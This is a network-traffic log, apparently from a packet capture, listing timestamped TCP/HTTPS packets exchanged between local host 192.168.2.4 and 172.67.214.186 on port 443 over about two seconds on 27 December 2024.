                                                                                                                                      Dec 27, 2024 10:21:51.783763885 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.791547060 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.791603088 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.791618109 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.806963921 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.807076931 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.807133913 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.807153940 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.807270050 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.814934015 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.822618008 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.822674990 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.822684050 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.822696924 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.822830915 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.830364943 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.838274002 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.840146065 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.840161085 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.846256018 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.848225117 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.848239899 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.901993036 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.902009964 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.948859930 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.973252058 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.977210999 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.980135918 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.980165958 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.987890005 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.988090038 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.988147020 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.988162041 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:51.992144108 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:51.995764017 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.003458977 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.004225969 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.004241943 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.018405914 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.018582106 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.018598080 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.018652916 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.033523083 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.033529997 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.033596992 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.041100979 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.041168928 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.048841953 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.048849106 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.048924923 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.063942909 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.063951015 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.064129114 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.078912973 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.078918934 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.079077959 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.174449921 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.174524069 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.183341026 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.183401108 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.191550970 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.191617012 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.202682972 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.202758074 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.207948923 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.208025932 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.218311071 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.218501091 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.223356962 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.223428965 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.233196020 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.233283043 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.243001938 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.243201971 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.252836943 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.252937078 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.257853985 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.257930040 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.267776012 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.267854929 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.272666931 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.272826910 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.282612085 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.282686949 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.292331934 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.292485952 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.302164078 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.302238941 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.307306051 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.307466030 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.375684977 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.375904083 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.380239964 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.380311012 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.387298107 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.387391090 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.390748978 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.390830994 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.397300959 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.397371054 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.400727034 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.400785923 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.406892061 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.406950951 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.412997007 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.413079023 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.419042110 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.419114113 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.422094107 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.422157049 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.427911043 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.427972078 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.430761099 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.430841923 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.435384035 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.435446024 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.438872099 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.438947916 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.442406893 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.442488909 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.444452047 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.444519043 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.447736025 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.447798014 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.455848932 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.455856085 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.455904007 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.455925941 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.455945015 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.455976009 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.455996037 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.468218088 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.468234062 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.468307972 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.468323946 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.468403101 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.480643034 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.480659962 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.480720997 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.480736017 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.480976105 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.577215910 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.577240944 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.577316999 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.577338934 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.577367067 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.577403069 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.586143970 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.586160898 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.586251020 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.586266041 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.587150097 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.596188068 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.596204996 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.596288919 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.596319914 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.599152088 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.605850935 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.605866909 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.606044054 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.606059074 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.608140945 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.615761995 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.615777016 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.615843058 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.615858078 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.620135069 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.622487068 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.622500896 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.622585058 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.622598886 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.623142958 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.627855062 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.627870083 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.627935886 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.627949953 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.632138014 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.633769035 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.633784056 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.633843899 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.633857965 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.635155916 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.780599117 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.780616999 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.780680895 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.780713081 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.780744076 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.782154083 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.786577940 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.786593914 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.786648989 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.786663055 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.788140059 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.792558908 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.792573929 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.792629957 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.792644024 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.792813063 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.797828913 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.797843933 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.797904015 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.797918081 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.800137997 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.803818941 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.803833008 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.803903103 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.803915977 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.806147099 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.809403896 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.809418917 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.809475899 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.809489965 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.812138081 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.815330982 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.815346956 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.815402985 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.815432072 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.818150043 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.821314096 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.821329117 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.821382046 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.821396112 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.824130058 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.982377052 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.982393980 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.982491970 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.982513905 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.982568979 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.988262892 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.988277912 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.988339901 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.988353968 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.988419056 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.994236946 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.994256020 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.994328976 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.994343996 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.994393110 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.999507904 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.999522924 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.999581099 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:52.999594927 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:52.999641895 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.005551100 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.005565882 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.005633116 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.005646944 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.005697012 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.011054993 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.011069059 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.011138916 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.011151075 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.011197090 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.016987085 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.017000914 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.017085075 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.017100096 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.017164946 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.022964001 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.022984982 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.023052931 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.023068905 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.023119926 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.183806896 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.183823109 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.184014082 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.184039116 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.184097052 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.189791918 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.189806938 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.189882994 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.189897060 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.189951897 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.195041895 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.195058107 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.195122004 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.195137024 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.195188046 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.201142073 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.201157093 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.201230049 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.201245070 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.201293945 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.206964970 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.206985950 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.207045078 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.207060099 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.207113028 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.212541103 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.212557077 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.212625027 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.212637901 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.212688923 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.218542099 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.218556881 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.218628883 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.218642950 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.218696117 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.223813057 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.223829031 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.223897934 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.223912001 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.223965883 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:53.385169029 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.385189056 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:53.385364056 CET49745443192.168.2.4172.67.214.186
